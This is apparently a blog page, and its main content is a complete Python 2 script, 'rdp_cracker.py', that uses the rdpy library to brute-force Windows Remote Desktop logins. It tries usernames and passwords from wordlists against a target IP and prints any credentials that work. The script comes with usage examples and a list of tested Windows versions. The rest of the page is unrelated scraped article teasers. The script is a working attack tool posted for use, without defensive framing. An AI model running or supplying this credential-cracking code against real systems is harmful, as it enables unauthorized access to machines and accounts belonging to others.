leng_que
leng_que

rdp_cracker.py

#!/usr/bin/python

# need: Python 2.7 + pip install rdpy

import sys, os, getopt

import twisted.python.log as twisted_log
from twisted.internet import reactor

import rdpy.core.log as rdpy_log
from rdpy.protocol.rdp import rdp
from rdpy.core.error import RDPSecurityNegoFail

class RDPTestFactory(rdp.ClientFactory):
    def __init__(self, reactor, security, i, u, p, t):
        self._reactor = reactor
        self._security = security
        self._i = i
        self._u = u
        self._p = p
        self._t = t

    def clientConnectionLost(self, connector, reason):
        global g_Cracked
        if reason.type == RDPSecurityNegoFail:
            print ""
            print reason.type
            self._reactor.stop()
        if 0 == g_Cracked and 1 == do_crack():
            print "\n"+'Done.'
            self._reactor.stop()

    def clientConnectionFailed(self, connector, reason):
        print "\n"+"[clientConnectionFailed]"
        self._reactor.stop()

    def buildObserver(self, controller, addr):

        class TestObserver(rdp.RDPClientObserver):
            def __init__(self, controller, reactor, i, u, p, t):
                rdp.RDPClientObserver.__init__(self, controller)
                self._controller = controller
                self._reactor = reactor
                self._i = i
                self._u = u
                self._p = p
                self._t = t
                self._startTimeout = False

            def onReady(self):
                global g_count_onReady
                g_count_onReady += 1

            def onSessionReady(self):
                global g_arg_win2003
                global g_Cracked
                if 0 == g_arg_win2003 or (1 == g_arg_win2003 and 2 == g_count_onReady):
                    print "\nFound!!! "+self._i+":"+self._u+":"+self._p
                    g_Cracked = 1
                    self._controller.close();
                    self._reactor.stop()
                else:
                    pass

            def onClose(self):
                global g_count_onReady
                g_count_onReady = 0

            def onUpdate(self, destLeft, destTop, destRight, destBottom, width, height, bitsPerPixel, isCompress, data):
                if not self._startTimeout:
                    self._startTimeout = True
                    self._reactor.callLater(self._t, self.checkUpdate)

            def checkUpdate(self):
                self._controller.close();

        controller.setUsername(self._u)
        controller.setPassword(self._p)
        controller.setSecurityLevel(self._security)

        return TestObserver(controller, self._reactor, self._i, self._u, self._p, self._t)

def do_crack():

    global g_arg_username
    global g_arg_password
    global g_arg_user_file
    global g_arg_pass_file
    global g_arg_timeout
    global g_arg_mode
    global g_arg_verbose

    global g_arg_target_ip
    global g_arg_target_port

    global g_array_usernames
    global g_index_usernames
    global g_array_passwords
    global g_index_passwords

    if g_index_usernames >= len(g_array_usernames):
        return 1 # finish

    if g_index_passwords < len(g_array_passwords):
        u = g_array_usernames[g_index_usernames][:-1]
        p = g_array_passwords[g_index_passwords][:-1]
        if 1 == g_arg_verbose:
            print "* "+g_arg_target_ip+":"+u+":"+p
        else:
            sys.stdout.write('*')
            sys.stdout.flush()
        reactor.connectTCP(g_arg_target_ip, int(g_arg_target_port), RDPTestFactory(reactor, g_arg_mode, g_arg_target_ip, u, p, g_arg_timeout), g_arg_timeout)
        g_index_passwords += 1

    if g_index_passwords >= len(g_array_passwords):
        g_index_passwords = 0
        g_index_usernames += 1

    return 0 # doing

'''
setSecurityLevel:
    rdp.SecurityLevel.RDP_LEVEL_RDP = 0
    rdp.SecurityLevel.RDP_LEVEL_SSL = 1
    rdp.SecurityLevel.RDP_LEVEL_NLA = 2
'''

def help():
    print "Usage: python rdp_cracker.py [options] IP[:port (default: 3389)]"
    print "\t-h: help"

def longhelp():
    print "--------------------------------------------"
    print "--- RDP Cracker v2.0 (leng_que@20151211) ---"
    print "--------------------------------------------"
    print "Usage: python rdp_cracker.py [options] IP[:port (default: 3389)]"
    print "\t-h: help"
    print "\t-u USER: username (default: administrator)"
    print "\t-p PASS: password (default: 123456)"
    print "\t-U FILE: username file"
    print "\t-P FILE: password file"
    print "\t-t SECONDS: connect max timeout seconds (default: 3)"
    print "\t-m MODE: connect mode 0:RDP 1:SSL 2:NLA (default: 2)"
    print "\t-v: verbose"
    print "\t--win2003: indicate the target OS is Windows Server 2003"
    print ""
    print "Example:"
    print "python rdp_cracker.py 192.168.0.2"
    print "python rdp_cracker.py -u administrator -p 123456 -t 3 -m 2 192.168.0.2"
    print "python rdp_cracker.py -U users.lst -P 3389.dic -m 1 -v 192.168.0.3"
    print "python rdp_cracker.py -P 3389.dic -t 6 -m 0 --win2003 192.168.0.203"
    print ""
    print "Tested:"
    print "WindowsXP SP3"
    print "Windows7 SP1"
    print "Windows Server 2003 SP2"
    print "Windows Server 2008 R2"

def main():

    global g_arg_username
    global g_arg_password
    global g_arg_user_file
    global g_arg_pass_file
    global g_arg_timeout
    global g_arg_mode
    global g_arg_verbose
    global g_arg_win2003

    global g_arg_target_ip
    global g_arg_target_port

    global g_array_usernames
    global g_index_usernames
    global g_array_passwords
    global g_index_passwords

    try:
        opts, args = getopt.getopt(sys.argv[1:], "hu:p:U:P:t:m:v", ["win2003"])
    except getopt.GetoptError:
        help()
        sys.exit()

    for opt, arg in opts:
        if opt == "-h":
            longhelp()
            sys.exit()
        elif opt == "-u":
            g_arg_username = arg
        elif opt == "-p":
            g_arg_password = arg
        elif opt == "-U":
            g_arg_user_file = arg
        elif opt == "-P":
            g_arg_pass_file = arg
        elif opt == "-t":
            g_arg_timeout = int(arg)
        elif opt == "-m":
            g_arg_mode = int(arg)
        elif opt == "-v":
            g_arg_verbose = 1
        elif opt == "--win2003":
            g_arg_win2003 = 1

    if len(args) == 0:
        help()
        sys.exit()
    elif ':' in args[0]:
        g_arg_target_ip, g_arg_target_port = args[0].split(':')
    else:
        g_arg_target_ip, g_arg_target_port = args[0], "3389"

    if 1 == g_arg_verbose:
        print ("[u:%s]"%(g_arg_username))
        print ("[p:%s]"%(g_arg_password))
        print ("[U:%s]"%(g_arg_user_file))
        print ("[P:%s]"%(g_arg_pass_file))
        print ("[t:%s]"%(g_arg_timeout))
        print ("[m:%s]"%(g_arg_mode))
        print ("[win2003:%s]"%(g_arg_win2003))

        print ("[IP:%s]"%(g_arg_target_ip))
        print ("[port:%s]"%(g_arg_target_port))

    if len(g_arg_user_file) > 0:
        f = open(g_arg_user_file, 'rU')
        g_array_usernames = f.readlines()
        f.close()
    if len(g_array_usernames) <= 0:
        g_array_usernames.append(g_arg_username+"\n")

    if len(g_arg_pass_file) > 0:
        f = open(g_arg_pass_file, 'rU') # great! compatible osx/linux/windows \r \n \r\n
        g_array_passwords = f.readlines()
        f.close()
    if len(g_array_passwords) <= 0:
        g_array_passwords.append(g_arg_password+"\n")

    print "running..."

    if 0 == do_crack():
        reactor.run()
    else:
        print 'Done.'

if __name__ == '__main__':
    rdpy_log._LOG_LEVEL = rdpy_log.Level.NONE
    twisted_log.startLoggingWithObserver(None,None)

    g_arg_username = 'administrator'
    g_arg_password = '123456'
    g_arg_user_file = ''
    g_arg_pass_file = ''
    g_arg_timeout = 3
    g_arg_mode = 2
    g_arg_verbose = 0
    g_arg_win2003 = 0

    g_arg_target_ip = None
    g_arg_target_port = None

    g_array_usernames = []
    g_index_usernames = 0
    g_array_passwords = []
    g_index_passwords = 0

    g_count_onReady = 0
    g_Cracked = 0

    main()



 
 
 


                            

                        

                    

                    
                    

                    
                    
                    

                

                

                    
                

            

        

    

    

        
你可能感兴趣的:(信息安全)

        

            

                
    
                    
  • 在线项目管理工具内网怎么用
                        
项目管理工具
                        
    随着企业规模的扩大和项目管理复杂性的增加,许多公司已经开始使用在线项目管理工具来提高协作效率和项目透明度。然而,在企业内部网络环境下如何有效地使用这些工具,尤其是针对安全性、权限管理以及高效团队协作的问题,仍然是许多企业面临的挑战。通过合理配置内网环境、定制权限策略、强化信息安全,可以确保在线项目管理工具的高效与安全使用。而且,针对不同的项目需求,选择适合的工具是非常重要的。在本文中,我们将深入探
    
                    
    • 
                    
  • 华为HCIE-Security认证考试流程、考试内容
                        GZ_TOGOGO
华为服务器运维
                        
    【HCIE-Security认证介绍】HCIE-Security(华为认证安全专家)是华为认证体系中的专家级安全认证,专注于培养和认证具备企业信息安全解决方案整体的设计、部署和运维综合能力的专家级人才。【HCIE-Security认证考试流程】①注册华为账号:如果考生没有华为账号,需要先在华为官网注册。②预约考试:通过华为官方“人才在线”网站进行考试预约,并补充完整的个人信息。③支付考试费用:考生
    
                    
    • 
                    
  • 大型集团企业IT信息化(管理架构、应用架构、技术架构)战略规划方案
                        公众号:优享智库
数字化转型数据治理主数据数据仓库架构微服务数据挖掘大数据人工智能
                        
    集团企业IT信息化(管理架构、应用架构、技术架构)战略规划方案IT信息化现状及需求分析集团企业业务概况与发展趋势现有IT基础设施及应用系统评估业务流程优化与整合需求信息安全与风险管理要求管理架构规划与设计组织结构调整与优化建议岗位职责划分与协作机制建立决策支持体系构建及实施策略持续改进机制设置和监控指标应用架构规划与实施策略核心应用系统选型及部署方案数据集成、共享和交换平台设计业务流程自动化、智能
    
                    
    • 
                    
  • 企业IT基础建设全套流程方案(目录)
                        玩人工智能的辣条哥
企业IT基础建设全套流程方案it建设
                        
    一、机房建设运维二、网络建设运维三、服务器建设运维四、桌面设备建设运维五、信息安全建设运维六、编制企业IT制度
    
                    
    • 
                    
  • 计算机网络 (51)鉴别
                        IT 青年
一研为定计算机网络
                        
    前言计算机网络鉴别是信息安全领域中的一项关键技术,主要用于验证用户或信息的真实性,以及确保信息的完整性和来源的可靠性。一、目的与重要性鉴别的目的是验明用户或信息的正身,对实体声称的身份进行唯一识别,以便验证其访问请求、保证信息来自或到达指定的源和目的。在信息安全领域,鉴别技术可以验证消息的完整性,有效地对抗冒充、非法访问和重放等威胁,是维护网络安全的重要手段。二、分类报文鉴别:定义:报文鉴别是指验
    
                    
    • 
                    
  • 《极速优化工具,全面保护您的电脑系统》
                        風落
软件需求软件工程电脑
                        
    球领先的系统优化工具,为您提供全面的电脑维护解决方案。这款软件集成了电脑体检、系统清理、系统优化、隐私保护和系统监视等多功能,旨在精简系统、管理启动项、优化及清理注册表,同时清理个人隐私数据,确保您的个人信息安全。核心功能概览:注册表与磁盘清理:高效清除无效注册表项和冗余文件,释放宝贵的磁盘空间。隐私保护:严密维护您的个人隐私记录,防止未授权程序篡改注册表,保障您的隐私安全。系统优化:深度优化系统
    
                    
    • 
                    
  • 零基础小白学习网络安全的必备指南!
                        Stanford_1106
学习网络运维网络微信开放平台微信小程序微信公众平台twitterweb安全安全
                        
    成长路上不孤单【14后///计算机爱好者///持续分享所学///如有需要欢迎收藏转发///】今日分享关于网络安全方面的相关内容!关于【网络安全】目录:一、了解网络安全基础知识二、学习计算机和网络基础知识三、掌握网络安全技术四、使用网络安全工具五、实战操作六、了解法律法规与职业道德七、持续学习与提升网络安全对于现代社会的重要性不言而喻,它关乎到个人信息安全、企业机密保护乃至国家安全。然而,对于许多零
    
                    
    • 
                    
  • 证券会工程师:重视证券期货业信息安全
                        weixin_34087307
系统安全运维网络
                        
    本文讲的是证券会工程师:重视证券期货业信息安全,2009中国计算机网络安全应急年会于2009年10月21日至24日在湖南长沙召开,本届年会主题是“网络促进发展安全创造价值”。23日进入会议第二天,本次会议众专家学者探讨了有关电子商务安全方面的问题,下面为中国证监会信息中心总工程师罗凯谈话实录:林鹏:大家下午好,我们这里本次分论坛——金融安全与电子商务作为分论坛的主题。这个活动得到金融界高度的关注。
    
                    
    • 
                    
  • 网络安全:信息时代的守护者
                        我是章汕呐
网络
                        
    随着互联网的快速发展,网络安全问题日益成为全球关注的焦点。无论是个人用户、企业组织还是政府部门,网络安全都已成为保障信息安全、保护隐私、确保社会秩序的基石。在这个数字化时代,如何应对复杂多变的网络安全威胁,成为了我们共同的挑战。一、网络安全的现状与挑战网络安全是指通过各种技术手段、管理措施和策略,确保网络系统的稳定运行、数据传输的安全、信息资源的保密性以及用户隐私的保护。然而,随着技术的进步,网络
    
                    
    • 
                    
  • 全新发布:企业级安全网盘解决方案,助力数据高效流转与安全管理!
                        c++代码诗人
信息安全开发语言c++
                        
    全新发布:企业级安全网盘解决方案,助力数据高效流转与安全管理!在数字化办公快速发展的今天,信息安全与数据高效管理成为企业的核心需求。我们全新推出的企业级网盘系统,为您提供一站式解决方案,集稳定性、高安全性、多功能性于一体,助力您的企业高效运行和数据安全保障。以下是我们的网盘核心亮点:1.稳定可靠的技术架构客户端采用MFC开发:运行高效,界面直观,用户体验流畅,特别适合Windows系统用户。服务端
    
                    
    • 
                    
  • 脑机接口:信息安全新领域的机遇与挑战
                        烁月_o9
网络安全web安全其他
                        
    脑机接口:信息安全新领域的机遇与挑战摘要脑机接口(Brain-ComputerInterface,BCI)技术作为连接大脑与外部设备的新兴交互方式,正以前所未有的速度发展,为医疗、娱乐、教育等多领域带来了巨大变革。然而,随着其应用的不断拓展,脑机接口在信息安全方面面临着诸多挑战。本文深入探讨脑机接口技术的发展现状,剖析其在信息安全领域所面临的机遇与挑战,并提出相应的应对策略,旨在为脑机接口技术的安
    
                    
    • 
                    
  • 网络安全笔记-信息安全工程师与网络安全工程师考试大纲(附:Web安全大纲)_信息网络安全师认证(inspc)培训工作大纲
                        程序员鬼鬼
web安全笔记网络计算机网络安全学习linux
                        
    Web安全大纲2024信息安全工程师考试大纲1、考试目标通过本考试的合格人员能够掌握网络信息安全的基础知识和技术原理;根据国家网络信息安全相关法律法规及业务安全保障要求,能够规划、设计信息系统安全方案,能够配置和维护常见的网络安全设备及系统;能够对信息系统的网络安全风险进行监测和分析,并给出网络安全风险问题的整改建议;能够协助相关部门对单位的信息系统进行网络安全审计和网络安全事件调查;能够对网络信
    
                    
    • 
                    
  • 深入了解WAF防火墙及其在中国的发展现状
                        兴风键盘侠
安全防护网络系统安全安全
                        
    随着网络安全威胁的不断升级,网络应用防护成为企业信息安全的重要组成部分。WAF(WebApplicationFirewall,Web应用防火墙)正是应对这一挑战的关键工具之一。本文将详细介绍WAF防火墙的概念、功能、技术特点,以及其在中国市场的现状与未来发展趋势。一、什么是WAF防火墙?WAF(WebApplicationFirewall,Web应用防火墙)是一种专门保护Web应用的安全设备或服务
    
                    
    • 
                    
  • 深入了解WAF防火墙及其在中国的发展现状
                        兴风键盘侠
服务器管理网络系统安全安全
                        
    随着网络安全威胁的不断升级,网络应用防护成为企业信息安全的重要组成部分。WAF(WebApplicationFirewall,Web应用防火墙)正是应对这一挑战的关键工具之一。本文将详细介绍WAF防火墙的概念、功能、技术特点,以及其在中国市场的现状与未来发展趋势。一、什么是WAF防火墙?WAF(WebApplicationFirewall,Web应用防火墙)是一种专门保护Web应用的安全设备或服务
    
                    
    • 
                    
  • Tesla Free-Fall Attack:特斯拉汽车网络安全事件纪要
                        wit_@
网络安全web安全
                        
    TeslaFree-FallAttack:特斯拉汽车网络安全事件纪要1.引言TeslaFree-FallAttack是由腾讯科恩实验室(TencentKeenSecurityLab)于2016年9月对特斯拉ModelS汽车实施的一次远程攻击事件,揭示了汽车网络安全的严重漏洞,并引发了业界的广泛关注。该事件不仅暴露了特斯拉汽车在信息安全方面的薄弱环节,还对汽车行业的网络安全管理提出了严峻的挑战。2.
    
                    
    • 
                    
  • 2024年软考信息安全工程师备考学习笔记汇总
                        月梦工作室
信息安全工程师
                        
    信息安全工程师分属“信息系统”专业,位处中级资格,2016年下半年,第一次开考信息安全工程师(中级)考试。目前每年考试一次。已开考六次,2016年11月12日,2017年5月20日,2018年5月26日,2019年5月25日,2020年11月7日,2021年11月6日,2022年11月5日,2023年11月4日为第八次考试。第五次至第八次考试,采用第二版教材。信安精品课|月梦工作室(moondre
    
                    
    • 
                    
  • 2024年网络安全最全CTF —— 网络安全大赛_ctf网络安全大赛
                        网安墨雨
web安全安全
                        
    前言随着大数据、人工智能的发展,人们步入了新的时代,逐渐走上科技的巅峰。\⚔科技是一把双刃剑,网络安全不容忽视,人们的隐私在大数据面前暴露无遗,账户被盗、资金损失、网络诈骗、隐私泄露,种种迹象表明,随着互联网的发展,网络安全需要引起人们的重视。\互联网安全从其本质上来讲就是互联网上的信息安全。从广义来说,凡是涉及到互联网上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研
    
                    
    • 
                    
  • 医院如何进行安全等级保护?!推介方案:医院网络安全等级保护解决方案V1.0
                        智慧化智能化数字化方案
方案解读馆安全等级保护方案等保2.0医院等保方案
                        
    第一章项目概述背景1.1项目背景医院网络复杂,需满足高效办公和外界通讯需求,同时保障数据安全,应对《网络安全法》和等级保护要求。1.2项目建设目标建立安全技术防护体系,健全安全管理制度,制定应急预案,提供安全培训,完善整体安全规划。1.3方案设计原则遵循等级保护要求,体系化设计,采用先进产品,有序建设,提供细致化安全服务。1.4项目依据依据多项国家信息安全标准和法规,确保项目合规性。
    
                    
    • 
                    
  • 附原文 |《2024年漏洞与威胁趋势报告》深度解读
                        
漏洞
                        
    在信息技术飞速发展的当下,网络安全已然成为全球瞩目的焦点。安全极客社区精心译制的《2024年漏洞与威胁趋势报告》明确指出,2023年堪称网络安全领域的重要分水岭。这一年,新发现漏洞的数量出现了前所未有的增长态势,其中高危或严重级别的漏洞占比高达一半,漏洞利用的时间线显著缩短,然而平均修复时间却过长。金融服务、制造业以及公用事业等行业面临的网络威胁愈发严峻,首席信息安全官所承担的法律责任也日益加重。
    
                    
    • 
                    
  • 地理信息安全考试_判断题
                        MrWNG
地理信息安全在线考试题库安全
                        
    地理信息安全考试_判断题第1题:收发涉密载体应当履行清点、编号、登记、签收手续。A:对B:不对正确答案:A----------------------------------------第2题:存储、处理涉密测绘地理信息的涉密计算机必须拆除机内无线网卡等无线互联设备,切断无线联网渠道,可以连接无线鼠标、无线键盘等无线外围设备。A:正确B:错误正确答案:B答案解析:(三)涉密计算机外接设备管理要求。
    
                    
    • 
                    
  • 服务保障能力获认可,YashanDB入选工信安全2024信息技术产品服务保障示范案例
                        
数据库运维
                        
    12月18日,由深圳计算科学研究院与深圳市赛易特信息技术有限公司共同完成的“深圳燃气客服营销平台YashanDB迁移案例”入选工信部国家工业信息安全发展研究中心《2024年信息技术产品服务保障案例》。《2024年信息技术产品服务保障案例》征集活动是国家工业信息安全发展研究中心依托软件融合应用与测试验证工信部重点实验室,联合北京信息技术应用创新工作委员会、山东省信息产业协会信息技术应用创新工作委员会
    
                    
    • 
                    
  • ⽹络安全国标技术规范分类汇总
                        hao_wujing
安全
                        
    大家读完觉得有帮助记得关注和点赞!!!1、术语/导则GB/T25069-2022信息安全技术术语GB/T1.2-2020标准化工作导则第2部分以ISOIEC标准化文件为基础的标准化文件起草规则GB/T1.1-2020标准化工作导则第1部门标准化文件的结构和起草规则GB/T5271.8-2001信息技术词汇第8部分安全GB/T5271.1-2000信息技术词汇第1部分基本术语2.等级保护GA-T13
    
                    
    • 
                    
  • 移动互联网应用程序(APP)信息安全等级保护测评标准解读
                        学习等保ing......
移动互联等保测评网络安全
                        
    随着移动互联网的迅猛发展,移动应用(App)已成为个人信息处理与交互的主要渠道,其安全性直接关系到国家安全、社会稳定以及用户个人隐私权益。为加强移动App的信息安全管理,国家标准化管理委员会正式发布了GB/T42582-2023《信息安全技术移动互联网应用程序(App)个人信息安全测评规范》,此规范于2023年12月1日起正式施行。本文旨在对这一新标准进行深入解读,帮助企业及开发者更好地理解和遵循
    
                    
    • 
                    
  • 等保、密评专用—双算法SSL证书
                        

                        
    等保(网络安全等级保护)和密评(商用密码应用安全性评估)专用的双算法SSL证书,是结合了国际加密算法(如RSA)和国密算法(如SM2)的SSL证书。这类证书不仅满足了国内对于数据安全和信息保密的合规性要求,同时也确保了与国际标准的互操作性。以下是关于等保、密评专用双算法SSL证书的详细解析:一、优势合规性:满足《信息安全技术网络安全等级保护安全设计技术要求》(GB/T25070)中关于二级等保安全
    
                    
    • 
                    
  • 国内验签数据不出境的SSL证书怎么申请
                        
ssl证书https运维
                        
    申请国内验签且确保数据不出境的SSL证书指南在数字化时代,数据安全和隐私保护至关重要。对于在中国运营的网站或服务,确保SSL证书的申请和验证过程中数据不出境,是维护国家信息安全和用户隐私的重要一环。以下是一份详细的指南,帮助您申请国内验签且数据不出境的SSL证书。一、选择可信赖的国内CA机构调研与选择:首先,对国内外的CA(证书颁发机构)进行调研,选择一家信誉良好、技术成熟且符合国内法律法规要求的
    
                    
    • 
                    
  • 详细的等保测评攻略就在这里
                        快快小毛毛
网络网络安全系统安全
                        
    信息安全等级保护,是对信息和信息载体按照重要性等级分级别进行保护的一种工作。目前我国实行的是等保2.0于2019年12月1日开始实施,等保2.0从传统的信息系统,转变成具有基础信息网络平台的多种新兴技术对象,即具有网络服务,有数据的网络服务平台都可以成为新兴的测评对象。等保2.0备案从原来的自主定级改变成系统定级,才能得到公安机关的备案,关于等保测评详细攻略如下:等保2.0定级步骤:确定定级对象—
    
                    
    • 
                    
  • 等保测评中的关键技术挑战与应对策略
                        亿林数据
网络安全等保测评
                        
    在信息安全领域,等保测评(信息安全等级保护测评)作为确保信息系统安全性的重要手段,其过程中不可避免地会遇到一系列技术挑战。这些挑战不仅考验着企业的技术实力,也对其安全管理水平提出了更高要求。本文将深入探讨等保测评中的关键技术挑战,并提出相应的应对策略。一、等保测评中的关键技术挑战1.复杂系统架构的评估难度随着信息技术的快速发展,企业信息系统的架构日益复杂,包括分布式系统、微服务架构、云计算环境等。
    
                    
    • 
                    
  • CDGA学习笔记三-《数据安全》
                        zy_chris
网络安全
                        
    七、数据安全7.1引言数据安全包括安全策略和过程的规划、建立与执行,为数据和信息资产提供正确的身份验证、授权、访问和审计。要求来自以下方面:(1)利益相关方(2)政府法规(3)特定业务关注点(4)合法访问需求(5)合同义务7.1.1业务驱动因素1、降低风险信息安全首先对组织数据进行分级分类,对组织数据进行分类分级的整个流程:1)识别敏感数据资产并分类分级2)在企业中查找敏感数据3)确定保护每项资产
    
                    
    • 
                    
  • 学习笔记:FW内容安全概述
                        TKE_yinian

                        
    内容安全概述信息安全概述主要威胁关于防护简介内容安全威胁应用层威胁内容安全技术WEB安全应用安全入侵防御检测邮件安全数据安全网络安全反病毒全局环境感知沙箱检测信息安全概述•信息安全是对信息和信息系统进行保护,防止未授权的访问、使用、泄露、中断、修改、破坏并以此提供保密性、完整性和可用性。•为关键资产提供机密性、完整性和可用性(CIA三元组)保护是信息安全的核心目标。CIA(Confidential
    
                    
    • 
                    
  • 信创环境下源代码防泄露解决方案
                        Felixwb
网络服务器
                        
    在当今数字化时代,信息安全已成为企业生存与发展的基石,尤其是在信息技术应用创新(信创)环境下,数据保护更是被提升至前所未有的高度。SDC沙盒防泄露系统以其独特的技术架构和卓越的安全性能,在信创环境中构筑起一道坚不可摧的数据防护墙,有效保障了企业数据的安全与隐私。SDC沙盒防泄露系统是一款专为解决数据泄露问题而设计的高端安全产品。该系统通过构建一个隔离的、可控的执行环境(即“沙盒”),对敏感数据的访
    
                    
    • 
                                
  • 关于旗正规则引擎规则中的上传和下载问题
                                    何必如此
文件下载压缩jsp文件上传
                                    
    文件的上传下载都是数据流的输入输出,大致流程都是一样的。 
一、文件打包下载 
1.文件写入压缩包 
string mainPath="D:\upload\";     下载路径 
 
string tmpfileName=jar.zip;        &n
    
                                
    • 
                                
  • 【Spark九十九】Spark Streaming的batch interval时间内的数据流转源码分析
                                    bit1129
Stream
                                    
      
以如下代码为例(SocketInputDStream): 
Spark Streaming从Socket读取数据的代码是在SocketReceiver的receive方法中,撇开异常情况不谈(Receiver有重连机制,restart方法,默认情况下在Receiver挂了之后,间隔两秒钟重新建立Socket连接),读取到的数据通过调用store(textRead)方法进行存储。数据
    
                                
    • 
                                
  • spark master web ui 端口8080被占用解决方法
                                    daizj
8080端口占用sparkmaster web ui
                                    
    spark master web ui 默认端口为8080,当系统有其它程序也在使用该接口时,启动master时也不会报错,spark自己会改用其它端口,自动端口号加1,但为了可以控制到指定的端口,我们可以自行设置,修改方法: 
  
1、cd SPARK_HOME/sbin 
  
2、vi start-master.sh 
  
  
3、定位到下面部分
    
                                
    • 
                                
  • oracle_执行计划_谓词信息和数据获取
                                    周凡杨
oracle执行计划
                                    
      
oracle_执行计划_谓词信息和数据获取(上) 
一:简要说明  
在查看执行计划的信息中,经常会看到两个谓词filter和access,它们的区别是什么,理解了这两个词对我们解读Oracle的执行计划信息会有所帮助。 
简单说,执行计划如果显示是access,就表示这个谓词条件的值将会影响数据的访问路径(表还是索引),而filter表示谓词条件的值并不会影响数据访问路径,只起到
    
                                
    • 
                                
  • spring中datasource配置
                                    g21121
dataSource
                                    
    datasource配置有很多种,我介绍的一种是采用c3p0的,它的百科地址是: 
http://baike.baidu.com/view/920062.htm 
  
	<!-- spring加载资源文件 -->
	<bean name="propertiesConfig"
		class="org.springframework.b
    
                                
    • 
                                
  • web报表工具FineReport使用中遇到的常见报错及解决办法(三)
                                    老A不折腾
finereportFAQ报表软件
                                    
    这里写点抛砖引玉,希望大家能把自己整理的问题及解决方法晾出来,Mark一下,利人利己。 
  
出现问题先搜一下文档上有没有,再看看度娘有没有,再看看论坛有没有。有报错要看日志。下面简单罗列下常见的问题,大多文档上都有提到的。 
1、repeated column width is largerthan paper width: 
这个看这段话应该是很好理解的。比如做的模板页面宽度只能放
    
                                
    • 
                                
  • mysql 用户管理
                                    墙头上一根草
linuxmysqluser
                                    
    1.新建用户 //登录MYSQL@>mysql -u root -p@>密码//创建用户mysql> insert into mysql.user(Host,User,Password) values(‘localhost’,'jeecn’,password(‘jeecn’));//刷新系统权限表mysql>flush privileges;这样就创建了一个名为:
    
                                
    • 
                                
  • 关于使用Spring导致c3p0数据库死锁问题
                                    aijuans
springSpring 入门Spring 实例Spring3Spring 教程
                                    
    这个问题我实在是为整个 springsource 的员工蒙羞  
如果大家使用 spring 控制事务,使用 Open Session In View 模式,  
com.mchange.v2.resourcepool.TimeoutException: A client timed out while waiting to acquire a resource from com.mchange.
    
                                
    • 
                                
  • 百度词库联想
                                    annan211
百度
                                    
    

<!DOCTYPE html>
<html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>RunJS</title&g
    
                                
    • 
                                
  • int数据与byte之间的相互转换实现代码
                                    百合不是茶
位移int转bytebyte转int基本数据类型的实现
                                    
    在BMP文件和文件压缩时需要用到的int与byte转换,现将理解的贴出来; 
  
主要是要理解;位移等概念 http://baihe747.iteye.com/blog/2078029 
  
int转byte; 
  
byte转int; 
  
/**
 * 字节转成int,int转成字节
 * @author Administrator
 *

    
                                
    • 
                                
  • 简单模拟实现数据库连接池
                                    bijian1013
javathreadjava多线程简单模拟实现数据库连接池
                                    
    简单模拟实现数据库连接池 
实例1: 
package com.bijian.thread;

public class DB {

	//private static final int MAX_COUNT = 10;
	private static final DB instance = new DB();

	private int count = 0;
	private i
    
                                
    • 
                                
  • 一种基于Weblogic容器的鉴权设计
                                    bijian1013
javaweblogic
                                    
            服务器对请求的鉴权可以在请求头中加Authorization之类的key,将用户名、密码保存到此key对应的value中,当然对于用户名、密码这种高机密的信息,应该对其进行加砂加密等,最简单的方法如下: 
String  vuser_id = "weblogic";
String  vuse
    
                                
    • 
                                
  • 【RPC框架Hessian二】Hessian 对象序列化和反序列化
                                    bit1129
hessian
                                    
     任何一个对象从一个JVM传输到另一个JVM,都要经过序列化为二进制数据(或者字符串等其他格式,比如JSON),然后在反序列化为Java对象,这最后都是通过二进制的数据在不同的JVM之间传输(一般是通过Socket和二进制的数据传输),本文定义一个比较符合工作中。 
  1. 定义三个POJO 
   Person类 
package com.tom.hes
    
                                
    • 
                                
  • 【Hadoop十四】Hadoop提供的脚本的功能
                                    bit1129
hadoop
                                    
    1. hadoop-daemon.sh 
1.1 启动HDFS 
./hadoop-daemon.sh start namenode
./hadoop-daemon.sh start datanode 
 通过这种逐步启动的方式,比start-all.sh方式少了一个SecondaryNameNode进程,这不影响Hadoop的使用,其实在 Hadoop2.0中,SecondaryNa
    
                                
    • 
                                
  • 中国互联网走在“灰度”上
                                    ronin47
管理 灰度
                                    
    中国互联网走在“灰度”上(转) 
文/孕峰 
  
第一次听说灰度这个词,是任正非说新型管理者所需要的素质。第二次听说是来自马化腾。似乎其他人包括马云也用不同的语言说过类似的意思。 
  
灰度这个词所包含的意义和视野是广远的。要理解这个词,可能同样要用“灰度”的心态。灰度的反面,是规规矩矩,清清楚楚,泾渭分明,严谨条理,是决不妥协,不转弯,认死理。黑白分明不是灰度,像彩虹那样
    
                                
    • 
                                
  • java-51-输入一个矩阵,按照从外向里以顺时针的顺序依次打印出每一个数字。
                                    bylijinnan
java
                                    
    

public class PrintMatrixClockwisely {

	/**
	 * Q51.输入一个矩阵,按照从外向里以顺时针的顺序依次打印出每一个数字。
例如:如果输入如下矩阵:

1              2             3            4
5              6             7            8
9 
    
                                
    • 
                                
  • mongoDB 用户管理
                                    开窍的石头
mongoDB用户管理
                                    
      1:添加用户 
   第一次设置用户需要进入admin数据库下设置超级用户(use admin) 
  
   db.addUsr({user:'useName',pwd:'111111',roles:[readWrite,dbAdmin]}); 
   第一个参数用户的名字 
   第二个参数
    
                                
    • 
                                
  • [游戏与生活]玩暗黑破坏神3的一些问题
                                    comsci
生活
                                    
        暗黑破坏神3是有史以来最让人激动的游戏。。。。但是有几个问题需要我们注意 
 
 
     玩这个游戏的时间,每天不要超过一个小时,且每次玩游戏最好在白天 
 
     结束游戏之后,最好在太阳下面来晒一下身上的暗黑气息,让自己恢复人的生气 
 
  &nb
    
                                
    • 
                                
  • java 二维数组如何存入数据库
                                    cuiyadll
java
                                    
    using System;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Xml;
using System.Xml.Serialization;
using System.IO;
 
namespace WindowsFormsApplication1
{
    
    
                                
    • 
                                
  • 本地事务和全局事务Local Transaction and Global Transaction(JTA)
                                    darrenzhu
javaspringlocalglobaltransaction
                                    
    Configuring Spring and JTA without full Java EE 
 
http://spring.io/blog/2011/08/15/configuring-spring-and-jta-without-full-java-ee/ 
 
Spring doc -Transaction Management 
 
http://docs.spring.io/spri
    
                                
    • 
                                
  • Linux命令之alias - 设置命令的别名,让 Linux 命令更简练
                                    dcj3sjt126com
linuxalias
                                    
    用途说明 
